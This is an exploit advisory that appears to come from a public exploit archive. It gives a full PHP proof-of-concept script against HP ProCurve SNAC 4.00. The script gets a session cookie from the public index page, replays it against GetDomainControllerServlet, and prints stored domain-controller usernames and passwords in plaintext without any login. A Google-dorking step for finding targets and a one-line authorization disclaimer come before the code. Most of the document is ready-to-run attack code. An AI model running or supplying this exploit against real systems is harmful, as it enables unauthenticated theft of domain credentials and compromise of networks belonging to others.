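=============================================================================================================================================
| # Title : HP ProCurve 4.00 Credential Dumping Vulnerability                                                                                |
| # Author : indoushka                                                                                                                        |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                              |
| # Vendor : https://support.hpe.com/hpesc/public/docDisplay?docId=c02619966&docLocale=en_US                                                 |
=============================================================================================================================================

POC :

[+] Dorking in Google or another search engine.

[+] Code Description: Performs a credential-dumping attack against vulnerable HP ProCurve SNAC systems. The PoC obtains a session
    cookie from the public SNAC index page and replays it against GetDomainControllerServlet, which returns the stored
    domain-controller credentials without a valid login (Related : https://packetstorm.news/files/id/180690/ ; Linked CVE numbers: none listed).

[+] save code as poc.php.

[+] Set target : pass the host as the first CLI argument (php poc.php <host>) or edit the default assignment near the bottom of the script.

[+] Only run this against systems you are authorized to test. Extracted credentials are printed in plaintext to stdout.

[+] PayLoad :

<?php
/**
 * HP ProCurve SNAC - unauthenticated domain-controller credential disclosure PoC.
 *
 * Flow (unchanged from the original PoC):
 *   1. GET /RegWeb/html/snac/index.html and collect the Set-Cookie headers.
 *   2. GET /RegWeb/RegWeb/GetDomainControllerServlet with those cookies.
 *   3. Parse the returned XML for <Controllers><Domain> records.
 */
class HPSNACExploit
{
    /** @var string Target host name or IP address. */
    private $target;

    /** @var int TCP port of the HTTPS management interface. */
    private $port;

    /**
     * @param string $target host name or IP of the SNAC appliance
     * @param int    $port   HTTPS port; every request is built with the https:// scheme
     *
     * NOTE(review): the constructor head was truncated in the published listing;
     * 443 is assumed as the default because the script is invoked with a host only
     * and always speaks https:// - confirm against the original.
     */
    public function __construct($target, $port = 443)
    {
        $this->target = $target;
        $this->port = $port;
    }

    /**
     * Issue a GET to https://{target}:{port}{$url} and return the response.
     *
     * @param string $url            request path on the appliance, starting with "/"
     * @param string $cookies        raw "name=value; name2=value2" string sent as the Cookie header
     * @param bool   $includeHeaders when true the raw response headers are prepended to the body;
     *                               getSession() needs this to see Set-Cookie
     * @return string|null response text, or null on a transport error
     */
    private function sendRequest($url, $cookies = "", $includeHeaders = false)
    {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, "https://{$this->target}:{$this->port}{$url}");
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        // Without CURLOPT_HEADER curl returns the body only, so the original
        // getSession() regex on "Set-Cookie:" could never match anything.
        curl_setopt($ch, CURLOPT_HEADER, $includeHeaders);
        // The appliance usually ships a self-signed certificate, so peer/host
        // verification stays off as in the original PoC. This makes the exchange -
        // including the credentials it returns - interceptable by an on-path attacker.
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
        // Bounded timeouts so a filtered port does not hang the script indefinitely.
        curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
        curl_setopt($ch, CURLOPT_TIMEOUT, 30);
        if (!empty($cookies)) {
            curl_setopt($ch, CURLOPT_HTTPHEADER, ["Cookie: $cookies"]);
        }
        $response = curl_exec($ch);
        if ($response === false) {
            // Surface the transport error instead of silently treating it as "not vulnerable".
            echo "[-] Request to {$url} failed: " . curl_error($ch) . "\n";
            $response = null;
        }
        curl_close($ch);
        return $response;
    }

    /**
     * Fetch the public SNAC index page and collect every cookie it sets.
     *
     * @return string|null "name=value; name2=value2" ready for a Cookie header,
     *                     or null when the request failed or no cookie was set
     */
    public function getSession()
    {
        $response = $this->sendRequest("/RegWeb/html/snac/index.html", "", true);
        if ($response === null) {
            return null;
        }
        // Anchor on the header line and stop at the first attribute separator or
        // line end: the original "(.*?);" required a ";" and missed a bare
        // "Set-Cookie: JSESSIONID=..." with no attributes. Excluding CR/LF also
        // keeps a server-controlled value from injecting extra request headers.
        preg_match_all('/^Set-Cookie: ([^;\r\n]+)/mi', $response, $matches);
        // preg_match_all always populates $matches[1] (possibly empty), so the
        // original isset() check could not tell "no cookie" from success.
        return empty($matches[1]) ? null : implode("; ", $matches[1]);
    }

    /**
     * Call GetDomainControllerServlet with the harvested session cookie.
     *
     * @param string $session cookie string from getSession()
     * @return string|null raw XML body when it mentions "domainName", otherwise null
     */
    public function getDomainInfo($session)
    {
        $response = $this->sendRequest("/RegWeb/RegWeb/GetDomainControllerServlet", $session);
        if ($response === null || strpos($response, 'domainName') === false) {
            return null;
        }
        return $response;
    }

    /**
     * Extract domain-controller records from the servlet's XML.
     *
     * Expected layout (as read by the original PoC): <Controllers><Domain> elements
     * with children domainControllerIP, port, connType, userName and password.
     *
     * @param string $xmlData XML document returned by the appliance
     * @return array<int, array{ip:string,port:string,service:string,user:string,password:string}>
     *         empty when the document is malformed or has no Domain nodes
     */
    public function parseDomainData($xmlData)
    {
        $credentials = [];
        // The XML originates from the remote host and is untrusted: refuse any
        // network fetch of external DTDs/entities (LIBXML_NONET; entity substitution
        // is not enabled) and keep libxml warnings out of the PoC output.
        $previousErrorMode = libxml_use_internal_errors(true);
        $xml = simplexml_load_string($xmlData, 'SimpleXMLElement', LIBXML_NONET);
        libxml_clear_errors();
        libxml_use_internal_errors($previousErrorMode);

        if ($xml === false || !isset($xml->Controllers->Domain)) {
            return $credentials;
        }
        foreach ($xml->Controllers->Domain as $domain) {
            $credentials[] = [
                'ip' => (string) $domain->domainControllerIP,
                'port' => (string) $domain->port,
                'service' => (string) $domain->connType,
                'user' => (string) $domain->userName,
                'password' => (string) $domain->password,
            ];
        }
        return $credentials;
    }

    /**
     * Run the full chain and print any recovered credentials to stdout.
     *
     * Each failure stage prints a "[-]" line and returns; nothing is thrown.
     */
    public function exploit()
    {
        echo "[*] Trying to get session...\n";
        $session = $this->getSession();
        if (!$session) {
            echo "[-] Failed to obtain session. Target may not be vulnerable.\n";
            return;
        }

        echo "[*] Exploiting authentication bypass...\n";
        $domainInfo = $this->getDomainInfo($session);
        if (!$domainInfo) {
            echo "[-] Exploit failed. Target may not be vulnerable.\n";
            return;
        }

        echo "[*] Parsing extracted data...\n";
        $credentials = $this->parseDomainData($domainInfo);
        if (empty($credentials)) {
            echo "[!] No domain controllers found.\n";
            return;
        }

        // Plaintext secrets go to stdout: redirect or protect the output accordingly.
        echo "[+] Credentials found:\n";
        foreach ($credentials as $cred) {
            echo "Domain Controller: {$cred['ip']}:{$cred['port']} ({$cred['service']})\n";
            echo "Username: {$cred['user']}\n";
            echo "Password: {$cred['password']}\n";
            echo "-----------------------------------------\n";
        }
    }
}

// Set target: first CLI argument when given, otherwise the hard-coded default.
$target = isset($argv[1]) ? $argv[1] : "target.com";
$exploit = new HPSNACExploit($target);
$exploit->exploit();
?>

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================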